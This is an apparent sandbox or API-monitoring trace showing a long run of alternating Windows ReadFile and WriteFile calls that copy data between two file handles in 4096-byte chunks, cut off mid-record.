ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.887] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.888] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.889] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.890] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.891] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.892] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.893] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.893] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.894] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.895] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.896] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.897] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.898] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.899] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.899] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.899] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.899] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.899] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0094.900] WriteFile (in: hFile=0x33c, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, 